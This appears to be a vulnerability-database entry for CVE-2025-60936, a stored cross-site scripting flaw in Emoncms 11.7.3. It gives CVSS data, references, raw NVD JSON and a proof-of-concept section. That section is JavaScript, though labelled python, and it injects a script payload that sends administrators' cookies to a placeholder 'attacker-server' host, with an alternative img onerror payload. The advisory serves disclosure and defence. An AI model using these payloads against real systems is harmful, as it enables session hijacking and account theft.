CVE-2025-60936

Description

Emoncms 11.7.3 is vulnerable to Cross Site in the input handling mechanism. This vulnerability allows authenticated attackers with API access to inject malicious JavaScript code that executes when administrators view the application logs.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openenergymonitor:emoncms:11.7.3:*:*:*:*:*:*:* - VULNERABLE

Emoncms < 11.7.4

Emoncms 11.7.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-60936 XSS PoC for Emoncms 11.7.3
// Requires authenticated API access

const apiUrl = 'http://target-host/emoncms/input/post.json';
const apiKey = 'YOUR_API_KEY'; // Attacker needs valid API key

// Malicious payload - stored XSS in input handling
const maliciousPayload = '<script>\n' +
    '  fetch("http://attacker-server/steal?cookie=" + encodeURIComponent(document.cookie))\n' +
    '</script>';

// Send malicious input via API
const data = {
    node: 1,
    name: maliciousPayload,
    data: 'test_value'
};

fetch(apiUrl, {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer ' + apiKey
    },
    body: JSON.stringify(data)
})
.then(response => response.json())
.then(result => console.log('XSS payload injected:', result))
.catch(error => console.error('Error:', error));

// Alternative simpler payload for testing:
// "><img src=x onerror=alert(document.domain)>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-60936
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-60936
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-60936/
[4] VulDB https://vuldb.com/cve/CVE-2025-60936
[5] https://github.com/emoncms/emoncms/issues/1940

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-60936", "sourceIdentifier": "[email protected]", "published": "2025-10-24T15:15:40.440", "lastModified": "2025-10-28T02:32:52.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Emoncms 11.7.3 is vulnerable to Cross Site in the input handling mechanism. This vulnerability allows authenticated attackers with API access to inject malicious JavaScript code that executes when administrators view the application logs."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openenergymonitor:emoncms:11.7.3:*:*:*:*:*:*:*", "matchCriteriaId": "3C09BE6B-BA9D-42F3-A496-76F32FFE9E07"}]}]}], "references": [{"url": "https://github.com/emoncms/emoncms/issues/1940", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}